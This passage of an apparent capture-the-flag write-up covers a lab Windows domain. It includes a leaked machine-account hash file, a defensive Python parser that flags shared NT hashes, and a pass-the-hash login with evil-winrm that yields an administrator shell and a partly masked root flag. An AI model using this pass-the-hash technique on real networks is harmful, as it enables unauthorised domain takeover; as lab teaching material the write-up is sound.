MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
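The file is in pwdump format (user:RID:LM:NT:::) and every entry is a machine account. The parser below is an added example, not part of the write-up: it validates each line, and then reports the two facts a defender wants from a leaked dump like this: which accounts share an NT hash (identical hashes mean identical passwords, and here MailServer$/BackupServer$ and CitrixServer$/MonitoringServer$ each share one), and that the LM field is the empty-password constant, so LM storage is off. BACKUP_EXTRACT is the content of backup_extract.txt as shown above; the function names are my own.

```python
"""Triage a leaked pwdump/secretsdump-style hash file.

Added example; not part of the original write-up. BACKUP_EXTRACT is the
content of backup_extract.txt as shown above; the function names are my own.
"""
import re
from collections import defaultdict

# LM hash of an empty password: present when LM hash storage is disabled
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# user:rid:lm:nt::: as written by secretsdump.py / pwdump
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$")

BACKUP_EXTRACT = """\
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
"""


def parse_pwdump(text):
    """Return one dict per well-formed line; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if not m:
            continue
        records.append({
            "user": m["user"],
            "rid": int(m["rid"]),
            "lm": m["lm"].lower(),
            "nt": m["nt"].lower(),
            "machine": m["user"].endswith("$"),   # computer accounts end in $
        })
    return records


def shared_nt_hashes(records):
    """Map NT hash -> [users] for hashes reused by more than one account,
    preserving file order. Identical NT hashes mean identical passwords."""
    by_nt = defaultdict(list)
    for r in records:
        by_nt[r["nt"]].append(r["user"])
    return {h: users for h, users in by_nt.items() if len(users) > 1}


def summarize(records):
    """The facts worth reporting about a dump: size, account types,
    whether LM storage was off, and which passwords are shared."""
    return {
        "accounts": len(records),
        "machine_accounts": sum(r["machine"] for r in records),
        "lm_disabled": all(r["lm"] == EMPTY_LM for r in records),
        "shared_passwords": shared_nt_hashes(records),
    }


if __name__ == "__main__":
    summary = summarize(parse_pwdump(BACKUP_EXTRACT))
    for key, value in summary.items():
        print(f"{key}: {value}")
```

The RID parsed for FileServer$ (2065) is the last component of the SID that `whoami /all` prints for that account further down (S-1-5-21-2986980474-46765180-2505414164-2065), which is a quick way to confirm a dump belongs to the domain it claims to. Any NT hash in a world-readable share is a live credential, as the next step shows; the response is to reset the machine account passwords and remove the file, not just to restrict the share.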

This yields the NT hashes of several machine accounts; try passing one of them over WinRM

> evil-winrm -i 192.168.56.128 -u FileServer$ -H e41da7e79a4c76dbd9cf79d1cb325559
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                                                                       
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FileServer$\Documents> whoami
soupedecode\fileserver$

That gives a shell as the FileServer$ machine account

*Evil-WinRM* PS C:\Users\FileServer$\Documents> whoami /all

USER INFORMATION
----------------

User Name               SID
======================= ============================================
soupedecode\fileserver$ S-1-5-21-2986980474-46765180-2505414164-2065


GROUP INFORMATION
-----------------

Group Name                                         Type             SID                                         Attributes
================================================== ================ =========================================== ===============================================================
SOUPEDECODE\Domain Computers                       Group            S-1-5-21-2986980474-46765180-2505414164-515 Mandatory group, Enabled by default, Enabled group
Everyone                                           Well-known group S-1-1-0                                     Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access         Alias            S-1-5-32-554                                Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                      Alias            S-1-5-32-545                                Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                             Alias            S-1-5-32-544                                Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK                               Well-known group S-1-5-2                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                   Well-known group S-1-5-11                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                     Well-known group S-1-5-15                                    Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Enterprise Admins                      Group            S-1-5-21-2986980474-46765180-2505414164-519 Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Denied RODC Password Replication Group Alias            S-1-5-21-2986980474-46765180-2505414164-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication                   Well-known group S-1-5-64-10                                 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level               Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

FileServer$ is a member of BUILTIN\Administrators (and Enterprise Admins), so the root flag under Administrator can be read directly

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
a9564*********ad5ec60a